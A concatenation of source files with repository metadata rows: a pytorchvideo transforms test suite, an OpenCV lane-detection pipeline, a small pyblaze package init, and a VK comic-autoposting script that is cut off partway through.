from pytorchvideo.data.utils import thwc_to_cthw
from pytorchvideo.transforms import (
ApplyTransformToKey,
Normalize,
OpSampler,
RandomShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from pytorchvideo.transforms.functional import (
convert_to_one_hot,
uniform_temporal_subsample_repeated,
short_side_scale,
uniform_crop,
uniform_temporal_subsample,
)
from torchvision.transforms import Compose
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
from utils import create_dummy_video_frames
class TestTransforms(unittest.TestCase):
def test_compose_with_video_transforms(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
test_clip = {"video": video, "label": 0}
# Compose using torchvision and pytorchvideo transforms to ensure they interact
# correctly.
num_subsample = 10
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(num_subsample),
NormalizeVideo([video.mean()] * 3, [video.std()] * 3),
RandomShortSideScale(min_size=15, max_size=25),
RandomCropVideo(10),
RandomHorizontalFlipVideo(p=0.5),
]
),
)
]
)
actual = transform(test_clip)
c, t, h, w = actual["video"].shape
self.assertEqual(c, 3)
self.assertEqual(t, num_subsample)
self.assertEqual(h, 10)
self.assertEqual(w, 10)
def test_uniform_temporal_subsample(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, video.shape[1])
self.assertTrue(actual.equal(video))
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, video.shape[1] // 2)
self.assertTrue(actual.equal(video[:, [0, 2, 4, 6, 8, 10, 12, 14, 16, 19]]))
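# The expected indices above come from sampling 10 points uniformly over the 20 frames
# (roughly linspace(0, 19, 10) truncated to integers), hence the final jump from 16 to 19.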
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample(video, 1)
self.assertTrue(actual.equal(video[:, 0:1]))
def test_short_side_scale_width_shorter_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 20, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 10, 5))
def test_short_side_scale_height_shorter_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 20)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 5, 10))
def test_short_side_scale_equal_size_pytorch(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 10, backend="pytorch")
self.assertEqual(actual.shape, (3, 20, 10, 10))
def test_short_side_scale_width_shorter_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 20, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 10, 5))
def test_short_side_scale_height_shorter_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 20)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 5, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 5, 10))
def test_short_side_scale_equal_size_opencv(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 10, 10)).to(
dtype=torch.float32
)
actual = short_side_scale(video, 10, backend="opencv")
self.assertEqual(actual.shape, (3, 20, 10, 10))
def test_torchscriptable_input_output(self):
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
# Test all the torchscriptable tensors.
for transform in [UniformTemporalSubsample(10), RandomShortSideScale(10, 20)]:
transform_script = torch.jit.script(transform)
self.assertTrue(isinstance(transform_script, torch.jit.ScriptModule))
# Seed before each transform to force determinism.
torch.manual_seed(0)
output = transform(video)
torch.manual_seed(0)
script_output = transform_script(video)
self.assertTrue(output.equal(script_output))
def test_uniform_temporal_subsample_repeated(self):
video = thwc_to_cthw(create_dummy_video_frames(32, 10, 10)).to(
dtype=torch.float32
)
actual = uniform_temporal_subsample_repeated(video, (1, 4))
expected_shape = ((3, 32, 10, 10), (3, 8, 10, 10))
for idx in range(len(actual)):
self.assertEqual(actual[idx].shape, expected_shape[idx])
def test_uniform_crop(self):
# For videos with height < width.
video = thwc_to_cthw(create_dummy_video_frames(20, 30, 40)).to(
dtype=torch.float32
)
# Left crop.
actual = uniform_crop(video, size=20, spatial_idx=0)
self.assertTrue(actual.equal(video[:, :, 5:25, :20]))
# Center crop.
actual = uniform_crop(video, size=20, spatial_idx=1)
self.assertTrue(actual.equal(video[:, :, 5:25, 10:30]))
# Right crop.
actual = uniform_crop(video, size=20, spatial_idx=2)
self.assertTrue(actual.equal(video[:, :, 5:25, 20:]))
# For videos with height > width.
video = thwc_to_cthw(create_dummy_video_frames(20, 40, 30)).to(
dtype=torch.float32
)
# Top crop.
actual = uniform_crop(video, size=20, spatial_idx=0)
self.assertTrue(actual.equal(video[:, :, :20, 5:25]))
# Center crop.
actual = uniform_crop(video, size=20, spatial_idx=1)
self.assertTrue(actual.equal(video[:, :, 10:30, 5:25]))
# Bottom crop.
actual = uniform_crop(video, size=20, spatial_idx=2)
self.assertTrue(actual.equal(video[:, :, 20:, 5:25]))
def test_uniform_crop_transform(self):
video = thwc_to_cthw(create_dummy_video_frames(10, 30, 40)).to(
dtype=torch.float32
)
test_clip = {"video": video, "aug_index": 1, "label": 0}
transform = UniformCropVideo(20)
actual = transform(test_clip)
c, t, h, w = actual["video"].shape
self.assertEqual(c, 3)
self.assertEqual(t, 10)
self.assertEqual(h, 20)
self.assertEqual(w, 20)
self.assertTrue(actual["video"].equal(video[:, :, 5:25, 10:30]))
def test_normalize(self):
video = thwc_to_cthw(create_dummy_video_frames(10, 30, 40)).to(
dtype=torch.float32
)
transform = Normalize(video.mean(), video.std())
actual = transform(video)
self.assertAlmostEqual(actual.mean().item(), 0)
self.assertAlmostEqual(actual.std().item(), 1)
def test_convert_to_one_hot(self):
# Test without label smooth.
num_class = 5
num_samples = 10
labels = torch.arange(0, num_samples) % num_class
one_hot = convert_to_one_hot(labels, num_class)
self.assertEqual(one_hot.sum(), num_samples)
label_value = 1.0
for index in range(num_samples):
label = labels[index]
self.assertEqual(one_hot[index][label], label_value)
# Test with label smooth.
labels = torch.arange(0, num_samples) % num_class
label_smooth = 0.1
one_hot_smooth = convert_to_one_hot(
labels, num_class, label_smooth=label_smooth
)
self.assertEqual(one_hot_smooth.sum(), num_samples)
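# With label smoothing epsilon, the true class gets probability 1 - epsilon + epsilon / num_class
# and every other class gets epsilon / num_class, so each row still sums to 1.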
label_value_smooth = 1 - label_smooth + label_smooth / num_class
for index in range(num_samples):
label = labels[index]
self.assertEqual(one_hot_smooth[index][label], label_value_smooth)
def test_OpSampler(self):
# Test with weights.
n_transform = 3
transform_list = [lambda x, i=i: x.fill_(i) for i in range(n_transform)]
transform_weight = [1] * n_transform
transform = OpSampler(transform_list, transform_weight)
input_tensor = torch.rand(1)
out_tensor = transform(input_tensor)
self.assertTrue(out_tensor.sum() in list(range(n_transform)))
# Test without weights.
input_tensor = torch.rand(1)
transform_no_weight = OpSampler(transform_list)
out_tensor = transform_no_weight(input_tensor)
self.assertTrue(out_tensor.sum() in list(range(n_transform)))
# Make sure each transform is sampled without replacement.
transform_op_values = [3, 5, 7]
all_possible_out = [15, 21, 35]
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 100
transform_no_replacement = OpSampler(transform_list, num_sample_op=2)
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
self.assertTrue(out_tensor.sum() in all_possible_out)
# Make sure each transform is sampled with replacement.
transform_op_values = [3, 5, 7]
possible_replacement_out = [9, 25, 49]
input_tensor = torch.ones(1)
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 100
transform_no_replacement = OpSampler(
transform_list, replacement=True, num_sample_op=2
)
replace_time = 0
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
if out_tensor.sum() in possible_replacement_out:
replace_time += 1
self.assertTrue(replace_time > 0)
# Test that the sampling distribution roughly follows the given weights.
transform_op_values = [3.0, 5.0, 7.0]
input_tensor = torch.ones(1)
transform_list = [lambda x, i=i: x * i for i in transform_op_values]
test_time = 10000
weights = [10.0, 2.0, 1.0]
transform_no_replacement = OpSampler(transform_list, weights)
weight_counter = Counter()
for _ in range(test_time):
input_tensor = torch.ones(1)
out_tensor = transform_no_replacement(input_tensor)
weight_counter[out_tensor.sum().item()] += 1
for index, w in enumerate(weights):
gt_dis = w / sum(weights)
out_key = transform_op_values[index]
self.assertTrue(
np.allclose(weight_counter[out_key] / test_time, gt_dis, rtol=0.2)
)
| 38.35786
| 88
| 0.624553
| 10,686
| 0.931729
| 0
| 0
| 0
| 0
| 0
| 0
| 746
| 0.065045
|
62053e8d0f3189aeee01ea44d5273ade06244a54
| 20,905
|
py
|
Python
|
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
udacity-program_self_driving_car_engineer_v1.0/project04-lane_detection_advanced/project/full_pipeline.py
|
linksdl/futuretec-project-self_driving_cars_projects
|
38e8f14543132ec86a8bada8d708eefaef23fee8
|
[
"MIT"
] | null | null | null |
"""
# !/usr/bin/env python
# -*- coding: utf-8 -*-
@Time : 2022/2/24 20:12
@Author : shengdl999links@gmail.com
@ProjectName : udacity-program_self_driving_car_engineer_v1.0_source.0
@File : full_pipeline.py
"""
import numpy as np
import cv2
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
from moviepy.editor import VideoFileClip
# Load in the chessboard calibration images to a list
cal_image_loc = glob.glob('camera_cal/calibration*.jpg')
# Prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6 * 9, 3), np.float32)
objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
# Arrays for later storing object points and image points
obj_points = [] # 3d points in real world space
img_points = [] # 2d points in image plane.
# Make a list of calibration images
calibration_images = []
for im in cal_image_loc:
img = mpimg.imread(im)
calibration_images.append(img)
verbose = False
# Iterate through images for their points
for image in calibration_images:
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
pattern_found, corners = cv2.findChessboardCorners(gray, (9, 6), None)
if pattern_found is True:
obj_points.append(objp)
img_points.append(corners)
if verbose:
# Draw and display the corners
img = cv2.drawChessboardCorners(image, (9, 6), corners, pattern_found)
cv2.imshow('img', img)
cv2.waitKey(500)
if verbose:
cv2.destroyAllWindows()
# Returns camera calibration
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
class Left_Line():
"""
the left line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
class Right_Line():
"""
the right line
"""
def __init__(self):
# was the line detected in the last iteration?
self.detected = False
# recent polynomial coefficients
self.recent_fit = []
# polynomial coefficients averaged over the last n iterations
self.best_fit = None
# polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
# difference in fit coefficients between last and new fits
self.diffs = np.array([0, 0, 0], dtype='float')
# x values for detected line pixels
self.allx = None
# y values for detected line pixels
self.ally = None
# counter to reset after 5 iterations if issues arise
self.counter = 0
def pipeline(img, s_thresh=(125, 255), sx_thresh=(10, 100), R_thresh=(200, 255), sobel_kernel=3):
""" Pipeline to create binary image.
This version uses thresholds on the R & S color channels and Sobelx.
Binary activation occurs where any two of the three are activated.
"""
distorted_img = np.copy(img)
dst = cv2.undistort(distorted_img, mtx, dist, None, mtx)
# Pull R
R = dst[:, :, 0]
# Convert to HLS colorspace
hls = cv2.cvtColor(dst, cv2.COLOR_RGB2HLS).astype(np.float64)
h_channel = hls[:, :, 0]
l_channel = hls[:, :, 1]
s_channel = hls[:, :, 2]
# Sobelx - takes the derivate in x, absolute value, then rescale
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
abs_sobelx = np.absolute(sobelx)
scaled_sobelx = np.uint8(255 * abs_sobelx / np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobelx)
sxbinary[(scaled_sobelx >= sx_thresh[0]) & (scaled_sobelx <= sx_thresh[1])] = 1
# Threshold R color channel
R_binary = np.zeros_like(R)
R_binary[(R >= R_thresh[0]) & (R <= R_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# If two of the three are activated, activate in the binary image
combined_binary = np.zeros_like(sxbinary)
combined_binary[((s_binary == 1) & (sxbinary == 1)) | ((sxbinary == 1) & (R_binary == 1))
| ((s_binary == 1) & (R_binary == 1))] = 1
return combined_binary
def birds_eye(img, mtx, dist):
""" Birds eye first undistorts the image, using the calibration from earlier.
Next, using defined source image points and destination points,
it will transform the image as if the road was viewed from above,
like a bird would see. Returns the birds eye image and transform matrix.
"""
# Put the image through the pipeline to get the binary image
binary_img = pipeline(img)
# Undistort
undist = cv2.undistort(binary_img, mtx, dist, None, mtx)
# Grab the image shape
img_size = (undist.shape[1], undist.shape[0])
# Source points - defined area of lane line edges
src = np.float32([[690, 450], [1110, img_size[1]], [175, img_size[1]], [595, 450]])
# 4 destination points to transfer
offset = 300 # offset for dst points
dst = np.float32([[img_size[0] - offset, 0], [img_size[0] - offset, img_size[1]],
[offset, img_size[1]], [offset, 0]])
# Use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Use cv2.warpPerspective() to warp the image to a top-down view
top_down = cv2.warpPerspective(undist, M, img_size)
return top_down, M
def count_check(line):
""" Resets to using new sliding windows below if
upon failing five times in a row.
"""
if line.counter >= 5:
line.detected = False
def first_lines(img, mtx, dist):
""" First Lines uses the birds eye image from above,
creates a histogram of where the binary activations occur,
and uses sliding windows along the peak areas to estimate
where the lane lines are.
"""
# Load the birds eye image and transform matrix from birds_eye
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)
# Output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = int(histogram.shape[0] // 2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# Choose the number of sliding windows
nwindows = 9
# Set height of windows
window_height = int(binary_warped.shape[0] // nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated for each window
leftx_current = leftx_base
rightx_current = rightx_base
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window + 1) * window_height
win_y_high = binary_warped.shape[0] - window * window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
# Identify the nonzero pixels in x and y within the window
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (
nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (
nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
# The challenge videos sometimes throw errors, so the below try first
# Upon the error being thrown, set line.detected to False
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
left_line.detected = False
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
left_line.detected = False
# Next, right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
right_line.detected = False
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
right_line.detected = False
def second_ord_poly(line, val):
""" Simple function being used to help calculate distance from center.
Only used within Draw Lines below. Finds the base of the line at the
bottom of the image.
"""
a = line[0]
b = line[1]
c = line[2]
formula = (a * val ** 2) + (b * val) + c
return formula
def draw_lines(img, mtx, dist):
""" Draw Lines will first check whether the lines are detected.
If not, go back up to First Lines. If they are, we do not have to search
the whole image for the lines. We can then draw the lines,
as well as detect where the car is in relation to the middle of the lane,
and what type of curvature it is driving at.
"""
# Pull in the image
binary_warped, perspective_M = birds_eye(img, mtx, dist)
# Check if lines were last detected; if not, re-run first_lines
if not left_line.detected or not right_line.detected:
first_lines(img, mtx, dist)
# Set the fit as the current fit for now
left_fit = left_line.current_fit
right_fit = right_line.current_fit
# Again, find the lane indicators
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] - margin)) & (
nonzerox < (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy + left_fit[2] + margin)))
right_lane_inds = (
(nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] - margin)) & (
nonzerox < (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy + right_fit[2] + margin)))
# Set the x and y values of points on each line
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each again.
# Similar to first_lines, need to try in case of errors
# Left line first
try:
n = 5
left_line.current_fit = np.polyfit(lefty, leftx, 2)
left_line.all_x = leftx
left_line.all_y = lefty
left_line.recent_fit.append(left_line.current_fit)
if len(left_line.recent_fit) > 1:
left_line.diffs = (left_line.recent_fit[-2] - left_line.recent_fit[-1]) / left_line.recent_fit[-2]
left_line.recent_fit = left_line.recent_fit[-n:]
left_line.best_fit = np.mean(left_line.recent_fit, axis=0)
left_fit = left_line.current_fit
left_line.detected = True
left_line.counter = 0
except TypeError:
left_fit = left_line.best_fit
count_check(left_line)
except np.linalg.LinAlgError:
left_fit = left_line.best_fit
count_check(left_line)
# Now right line
try:
n = 5
right_line.current_fit = np.polyfit(righty, rightx, 2)
right_line.all_x = rightx
right_line.all_y = righty
right_line.recent_fit.append(right_line.current_fit)
if len(right_line.recent_fit) > 1:
right_line.diffs = (right_line.recent_fit[-2] - right_line.recent_fit[-1]) / right_line.recent_fit[-2]
right_line.recent_fit = right_line.recent_fit[-n:]
right_line.best_fit = np.mean(right_line.recent_fit, axis=0)
right_fit = right_line.current_fit
right_line.detected = True
right_line.counter = 0
except TypeError:
right_fit = right_line.best_fit
count_check(right_line)
except np.linalg.LinAlgError:
right_fit = right_line.best_fit
count_check(right_line)
# Generate x and y values for plotting
fity = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
fit_leftx = left_fit[0] * fity ** 2 + left_fit[1] * fity + left_fit[2]
fit_rightx = right_fit[0] * fity ** 2 + right_fit[1] * fity + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([fit_leftx - margin, fity]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_leftx + margin, fity])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([fit_rightx - margin, fity]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([fit_rightx + margin, fity])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Calculate the pixel curve radius
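# For a quadratic fit x = A*y^2 + B*y + C, the radius of curvature at y is
# R = (1 + (2*A*y + B)**2)**1.5 / |2*A|, evaluated here at the bottom of the image (y_eval).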
y_eval = np.max(fity)
left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(left_line.all_y * ym_per_pix, left_line.all_x * xm_per_pix, 2)
right_fit_cr = np.polyfit(right_line.all_y * ym_per_pix, right_line.all_x * xm_per_pix, 2)
# Calculate the new radii of curvature
left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * left_fit_cr[0])
right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
2 * right_fit_cr[0])
avg_rad = round(np.mean([left_curverad, right_curverad]), 0)
rad_text = "Radius of Curvature = {}(m)".format(avg_rad)
# Calculating middle of the image, aka where the car camera is
middle_of_image = img.shape[1] / 2
car_position = middle_of_image * xm_per_pix
# Calculating middle of the lane
left_line_base = second_ord_poly(left_fit_cr, img.shape[0] * ym_per_pix)
right_line_base = second_ord_poly(right_fit_cr, img.shape[0] * ym_per_pix)
lane_mid = (left_line_base + right_line_base) / 2
# Calculate distance from center and list differently based on left or right
dist_from_center = lane_mid - car_position
if dist_from_center >= 0:
center_text = "{} meters left of center".format(round(dist_from_center, 2))
else:
center_text = "{} meters right of center".format(round(-dist_from_center, 2))
# List car's position in relation to middle on the image and radius of curvature
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, center_text, (10, 50), font, 1, (255, 255, 255), 2)
cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
# Invert the transform matrix from birds_eye (to later make the image back to normal below)
Minv = np.linalg.inv(perspective_M)
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
return result
def process_image(image):
""" This processes through everything above.
Will return the image with car position, lane curvature, and lane lines drawn.
"""
result = draw_lines(image, mtx, dist)
return result
# Set the class lines equal to the variables used above
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
frame = cv2.imread(os.path.join(test_img_dir, test_img))
blend = process_image(frame)
cv2.imwrite('output_images/{}'.format(test_img), blend)
plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
plt.show()
| 39.743346
| 118
| 0.670796
| 1,568
| 0.075006
| 0
| 0
| 0
| 0
| 0
| 0
| 6,688
| 0.319923
|
620552e0f37628fdaf507905b2e507f52f6149a8
| 158
|
py
|
Python
|
pyblaze/nn/data/__init__.py
|
Greenroom-Robotics/pyblaze
|
e45e27fbd400b6ae2365ad2347165c7b5154ac51
|
[
"MIT"
] | 20
|
2020-03-29T08:43:15.000Z
|
2021-12-17T21:38:17.000Z
|
pyblaze/nn/data/__init__.py
|
borchero/bxtorch
|
8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb
|
[
"MIT"
] | 4
|
2020-10-27T20:43:40.000Z
|
2021-04-29T12:19:39.000Z
|
pyblaze/nn/data/__init__.py
|
borchero/bxtorch
|
8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb
|
[
"MIT"
] | 2
|
2020-08-16T18:10:49.000Z
|
2021-03-31T23:17:28.000Z
|
import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
| 31.6
| 52
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
62068b662c2e57cf87551975ea7649e2326a5cd6
| 3,128
|
py
|
Python
|
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
main.py
|
MokkoFm/autoposting-comic-books
|
07021369e88370aeda33fe4b5d4bb3cd8bf01399
|
[
"MIT"
] | null | null | null |
import requests
import os
import random
from dotenv import load_dotenv
import sys
def get_response(url, payload):
try:
response = requests.get(url, params=payload)
response.raise_for_status()
except requests.HTTPError:
sys.stderr.write("Error with URL\n")
return response
def get_url_to_upload(token, group_id):
url = "https://api.vk.com/method/photos.getWallUploadServer"
payload = {
"access_token": token,
"group_id": group_id,
"v": "5.124"
}
response = get_response(url, payload)
url_to_upload = response.json()["response"]["upload_url"]
return url_to_upload
def upload_comic_to_server(url_to_upload):
with open('xkcd.png', 'rb') as file:
files = {
'photo': file,
}
response = requests.post(url_to_upload, files=files)
response.raise_for_status()
image_on_server = response.json()
image_server = image_on_server["server"]
image_hash = image_on_server["hash"]
photo = image_on_server["photo"]
return image_server, image_hash, photo
def save_comic(image_server, image_hash, photo, token, group_id):
url = "https://api.vk.com/method/photos.saveWallPhoto"
payload = {
"access_token": token,
"server": image_server,
"hash": image_hash,
"photo": photo,
"group_id": group_id,
"v": "5.124"
}
response = get_response(url, payload)
saved_image = response.json()["response"][0]
owner_id = saved_image["owner_id"]
media_id = saved_image["id"]
return owner_id, media_id
def post_comic(owner_id, media_id, token, comment, group_id):
url = "https://api.vk.com/method/wall.post"
payload = {
"access_token": token,
"v": "5.124",
"owner_id": "-{}".format(group_id),
"message": comment,
"from_group": "1",
"attachments": "photo{}_{}".format(owner_id, media_id)
}
get_response(url, payload)
def get_last_comic_number():
url = "https://xkcd.com/info.0.json"
response = get_response(url, payload={})
last_comic_number = response.json()["num"]
return last_comic_number
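# Overall flow of main(): pick a random xkcd comic number, download its image and alt text,
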